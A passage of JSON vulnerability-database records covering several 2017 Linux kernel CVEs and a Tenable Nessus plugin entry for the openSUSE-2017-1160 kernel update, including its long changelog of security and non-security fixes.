["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12154"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.3"], "id": "CVE-2017-12154", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12154", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:23", "description": "The iscsi_if_rx function in drivers/scsi/scsi_transport_iscsi.c in the Linux kernel through 4.13.2 allows local users to cause a denial of service (panic) by leveraging incorrect length validation.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-09-15T10:29:00", "title": "CVE-2017-14489", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14489"], "modified": "2018-03-16T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.2"], "id": "CVE-2017-14489", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14489", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.2:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2020-09-14T16:35:38", "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - efi/fb: Avoid reconfiguration of BAR that covers the\n framebuffer (bsc#1051987).\n\n - efi/fb: Correct PCI_STD_RESOURCE_END usage\n (bsc#1051987).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n\n - iw_cxgb4: put ep reference in pass_accept_req()\n (fate#321658 bsc#1005778 fate#321660 bsc#1005780\n fate#321661 bsc#1005781).\n\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - kABI: Workaround kABI breakage of AMD-AVIC fixes\n (bsc#1044503).\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: Add struct kvm_vcpu pointer parameter to\n get_enable_apicv() (bsc#1044503).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: SVM: Add irqchip_split() checks before enabling\n AVIC (bsc#1044503).\n\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static\n array) (bsc#1059500).\n\n - kvm: SVM: Refactor AVIC vcpu initialization into\n avic_init_vcpu() (bsc#1044503).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - nvme-fabrics: generate spec-compliant UUID NQNs\n (bsc#1057498).\n\n - nvmet: Move serial number from controller to subsystem\n (bsc#1058550).\n\n - nvmet: preserve controller serial number between reboots\n (bsc#1058550).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring\n Unit driver (bsc#1036737).\n\n - perf: xgene: Include module.h (bsc#1036737).\n\n - perf: xgene: Move PMU leaf functions into function\n pointer structure (bsc#1036737).\n\n - perf: xgene: Parse PMU subnode from the match table\n (bsc#1036737).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in\n Power9 event list (bsc#1056686, fate#321438,\n bsc#1047238, git-fixes 34922527a2bc).\n\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code\n from power8 (fate#321438, bsc#1053043, git-fixes\n efe881afdd999).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - rdma/bnxt_re: Allocate multiple notification queues\n (bsc#1037579).\n\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback\n (bsc#1037579).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - Revert 'Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-pr\n ocessing.patch (bsc#1043598, bsc#1036215).' \n\n - Revert 'xfs: detect and handle invalid iclog size set by\n mkfs (bsc#1043598).'\n\n - Revert 'xfs: detect and trim torn writes during log\n recovery (bsc#1036215).' \n\n - Revert 'xfs: refactor and open code log record crc check\n (bsc#1036215).'\n\n - Revert 'xfs: refactor log record start detection into a\n new helper (bsc#1036215).'\n\n - Revert 'xfs: return start block of first bad log record\n during recovery (bsc#1036215).'\n\n - Revert 'xfs: support a crc verification only log record\n pass (bsc#1036215).'\n\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure\n (bsc#1059465).\n\n - scsi: megaraid_sas: Check valid aen class range to avoid\n kernel panic (bnc#1012382).\n\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead\n (bnc#1012382).\n\n - scsi: sg: factor out sg_fill_request_table()\n (bnc#1012382).\n\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE\n (bnc#1012382).\n\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n\n - scsi: sg: use standard lists for sg_requests\n (bnc#1012382).\n\n - scsi: storvsc: fix memory leak on ring buffer busy\n (bnc#1012382).\n\n - scsi_transport_fc: Also check for NOTPRESENT in\n fc_remote_port_add() (bsc#1037890).\n\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp\n ingress path (bnc#1012382).\n\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN\n response trace records (bnc#1012382).\n\n - scsi: zfcp: fix missing trace records for early returns\n in TMF eh handlers (bnc#1012382).\n\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to\n correlate with HBA (bnc#1012382).\n\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI\n trace records (bnc#1012382).\n\n - scsi: zfcp: fix queuecommand for scsi_eh commands when\n DIX enabled (bnc#1012382).\n\n - scsi: zfcp: trace HBA FSF response by default on dismiss\n or timedout late response (bnc#1012382).\n\n - scsi: zfcp: trace high part of 'new' 64 bit SCSI LUN\n (bnc#1012382).\n\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n\n - skd: Avoid that module unloading triggers a\n use-after-free (bnc#1012382).\n\n - skd: Submit requests to firmware before triggering the\n doorbell (bnc#1012382).\n\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags\n (bnc#1012382).\n\n - smb: Validate negotiate (to protect against downgrade)\n even if signing off (bnc#1012382).\n\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback\n (bnc#1012382).\n\n - timer/sysclt: Restrict timer migration sysctl values to\n 0 and 1 (bnc#1012382).\n\n - tracing: Apply trace_clock changes to instance max\n buffer (bnc#1012382).\n\n - tracing: Erase irqsoff trace with empty write\n (bnc#1012382).\n\n - tracing: Fix trace_pipe behavior for instance traces\n (bnc#1012382).\n\n - tty: fix __tty_insert_flip_char regression\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() fast path\n (bnc#1012382).\n\n - tty: improve tty_insert_flip_char() slow path\n (bnc#1012382).\n\n - Update\n patches.drivers/0029-perf-xgene-Remove-bogus-IS_ERR-chec\n k.patch (bsc#1036737).\n\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA\n offsets (bnc#1012382).\n\n - video: fbdev: aty: do not leak uninitialized padding in\n clk to userspace (bnc#1012382).\n\n - Workaround for kABI compatibility with DP-MST patches\n (bsc#1055493).\n\n - x86/cpu/amd: Hide unused legacy_fixup_core_id() function\n (bsc#1060229).\n\n - x86/cpu/amd: Limit cpu_core_id fixup to families older\n than F17h (bsc#1060229).\n\n - x86/fpu: Do not let userspace set bogus xcomp_bv\n (bnc#1012382).\n\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in\n core dumps (bnc#1012382).\n\n - x86/ldt: Fix off by one in get_segment_base()\n (bsc#1061872).\n\n - x86/mm: Fix boot crash caused by incorrect loop count\n calculation in sync_global_pgds() (bsc#1058512).\n\n - x86/mm: Fix fault error path using unsafe vma pointer\n (fate#321300).", "edition": 19, "cvss3": {"score": 7.1, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"}, "published": "2017-10-23T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2017-1160)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "modified": "2017-10-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2017-1160.NASL", "href": "https://www.tenable.com/plugins/nessus/104075", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-1160.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104075);\n script_version(\"3.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2017-1160)\");\n script_summary(english:\"Check for the openSUSE-2017-1160 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\nsecurity and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel\n allowed guest OS users to cause a denial of service\n (assertion failure, and hypervisor hang or crash) via an\n out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in\n net/wireless/nl80211.c in the Linux kernel This function\n did not check whether the required attributes are\n present in a Netlink request. This request can be issued\n by a user with the CAP_NET_ADMIN capability and may\n result in a NULL pointer dereference and system crash\n (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in\n arch/x86/kvm/vmx.c in the Linux kernel did not ensure\n that the 'CR8-load exiting' and 'CR8-store exiting' L0\n vmcs02 controls exist in cases where L1 omits the 'use\n TPR shadow' vmcs12 control, which allowed KVM L2 guest\n OS users to obtain read and write access to the hardware\n CR8 register (bnc#1058507).\n\nThe following non-security bugs were fixed :\n\n - arc: Re-enable MMU upon Machine Check exception\n (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via\n do_translation_fault (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines\n (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines\n (bnc#1012382).\n\n - bcache: correct cache_dirty_target in\n __update_writeback_rate() (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors\n (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO\n (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output\n (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run()\n (bnc#1012382).\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job\n (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions\n during flushing (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from\n free_reloc_roots() (bnc#1012382).\n\n - btrfs: prevent to set invalid default subvolid\n (bnc#1012382).\n\n - btrfs: propagate error to btrfs_cmp_data_prepare caller\n (bnc#1012382).\n\n - btrfs: qgroup: move noisy underflow warning to debugging\n build (bsc#1055755).\n\n - cifs: Fix SMB3.1.1 guest authentication to Samba\n (bnc#1012382).\n\n - cifs: release auth_key.response for reconnect\n (bnc#1012382).\n\n - crypto: AF_ALG - remove SGL terminator indicator when\n chaining (bnc#1012382).\n\n - crypto: talitos - Do not provide setkey for non hmac\n hashing algs (bnc#1012382).\n\n - crypto: talitos - fix sha224 (bnc#1012382).\n\n - cxl: Fix driver use count (bnc#1012382).\n\n - dmaengine: mmp-pdma: add number of requestors\n (bnc#1012382).\n\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n\n - drm: Add driver-private objects to atomic state\n (bsc#1055493).\n\n - drm/dp: Introduce MST topology state to track available\n link bandwidth (bsc#1055493).\n\n - efi/fb: Avoid reconfiguration of BAR that covers the\n framebuffer (bsc#1051987).\n\n - efi/fb: Correct PCI_STD_RESOURCE_END usage\n (bsc#1051987).\n\n - ext4: fix incorrect quotaoff if the quota feature is\n enabled (bnc#1012382).\n\n - ext4: fix quota inconsistency during orphan cleanup for\n read-only mounts (bnc#1012382).\n\n - f2fs: check hot_data for roll-forward recovery\n (bnc#1012382).\n\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n\n - ftrace: Fix memleak when unregistering dynamic ops when\n tracing disabled (bnc#1012382).\n\n - ftrace: Fix selftest goto location on error\n (bnc#1012382).\n\n - genirq: Fix for_each_action_of_desc() macro\n (bsc#1061064).\n\n - getcwd: Close race with d_move called by lustre\n (bsc#1052593).\n\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM\n switch (bnc#1022967).\n\n - input: i8042 - add Gigabyte P57 to the keyboard reset\n table (bnc#1012382).\n\n - iommu/vt-d: Avoid calling virt_to_phys() on NULL pointer\n (bsc#1061067).\n\n - ipv6: accept 64k - 1 packet length in\n ip6_find_1stfragopt() (bnc#1012382).\n\n - ipv6: add rcu grace period before freeing fib6_node\n (bnc#1012382).\n\n - ipv6: fix memory leak with multiple tables during netns\n destruction (bnc#1012382).\n\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n\n - iw_cxgb4: put ep reference in pass_accept_req()\n (fate#321658 bsc#1005778 fate#321660 bsc#1005780\n fate#321661 bsc#1005781).\n\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n\n - kabi/severities: ignore nfs_pgio_data_destroy\n\n - kABI: Workaround kABI breakage of AMD-AVIC fixes\n (bsc#1044503).\n\n - keys: fix writing past end of user-supplied buffer in\n keyring_read() (bnc#1012382).\n\n - keys: prevent creating a different user's keyrings\n (bnc#1012382).\n\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n\n - kvm: Add struct kvm_vcpu pointer parameter to\n get_enable_apicv() (bsc#1044503).\n\n - kvm: async_pf: Fix #DF due to inject 'Page not Present'\n and 'Page Ready' exceptions simultaneously\n (bsc#1061017).\n\n - kvm: PPC: Book3S: Fix race and leak in\n kvm_vm_ioctl_create_spapr_tce() (bnc#1012382).\n\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n\n - kvm: SVM: Add irqchip_split() checks before enabling\n AVIC (bsc#1044503).\n\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static\n array) (bsc#1059500).\n\n - kvm: SVM: Refactor AVIC vcpu initialization into\n avic_init_vcpu() (bsc#1044503).\n\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte()\n (bsc#1061017).\n\n - kvm: VMX: remove WARN_ON_ONCE in\n kvm_vcpu_trigger_posted_interrupt (bsc#1061017).\n\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n\n - mac80211: flush hw_roc_start work before cancelling the\n ROC (bnc#1012382).\n\n - md/bitmap: disable bitmap_resize for file-backed bitmaps\n (bsc#1061172).\n\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in\n break_stripe_batch_list (bnc#1012382).\n\n - md/raid5: release/flush io in raid5_do_work()\n (bnc#1012382).\n\n - media: uvcvideo: Prevent heap overflow when accessing\n mapped controls (bnc#1012382).\n\n - media: v4l2-compat-ioctl32: Fix timespec conversion\n (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input\n values with opposite signs (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of\n both inputs zero (bnc#1012382).\n\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both\n inputs negative (bnc#1012382).\n\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity\n and zero inputs (bnc#1012382).\n\n - mm: prevent double decrease of nr_reserved_highatomic\n (bnc#1012382).\n\n - nfsd: Fix general protection fault in\n release_lock_stateid() (bnc#1012382).\n\n - nvme-fabrics: generate spec-compliant UUID NQNs\n (bsc#1057498).\n\n - nvmet: Move serial number from controller to subsystem\n (bsc#1058550).\n\n - nvmet: preserve controller serial number between reboots\n (bsc#1058550).\n\n - pci: Allow PCI express root ports to find themselves\n (bsc#1061046).\n\n - pci: fix oops when try to find Root Port for a PCI\n device (bsc#1061046).\n\n - pci: Fix race condition with driver_override\n (bnc#1012382).\n\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n\n - pci: shpchp: Enable bridge bus mastering if MSI is\n enabled (bnc#1012382).\n\n - perf/x86: Fix RDPMC vs. mm_struct tracking\n (bsc#1061831).\n\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs.\n mm_struct tracking' (bsc#1061831).\n\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring\n Unit driver (bsc#1036737).\n\n - perf: xgene: Include module.h (bsc#1036737).\n\n - perf: xgene: Move PMU leaf functions into function\n pointer structure (bsc#1036737).\n\n - perf: xgene: Parse PMU subnode from the match table\n (bsc#1036737).\n\n - powerpc: Fix DAR reporting when alignment handler faults\n (bnc#1012382).\n\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in\n Power9 event list (bsc#1056686, fate#321438,\n bsc#1047238, git-fixes 34922527a2bc).\n\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code\n from power8 (fate#321438, bsc#1053043, git-fixes\n efe881afdd999).\n\n - powerpc/pseries: Fix parent_dn reference leak in\n add_dt_node() (bnc#1012382).\n\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n\n - rdma/bnxt_re: Allocate multiple notification queues\n (bsc#1037579).\n\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback\n (bsc#1037579).\n\n - Revert 'net: fix percpu memory leaks' (bnc#1012382).\n\n - Revert 'net: phy: Correctly process PHY_HALTED in\n phy_stop_machine()' (bnc#1012382).\n\n - Revert 'net: use lib/percpu_counter API for\n fragmentation mem accounting' (bnc#1012382).\n\n - Revert 'Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-pr\n ocessing.patch (bsc#1043598, bsc#1036215).' \n\n - Revert 'xfs: detect and handle invalid iclog size set by\n mkfs 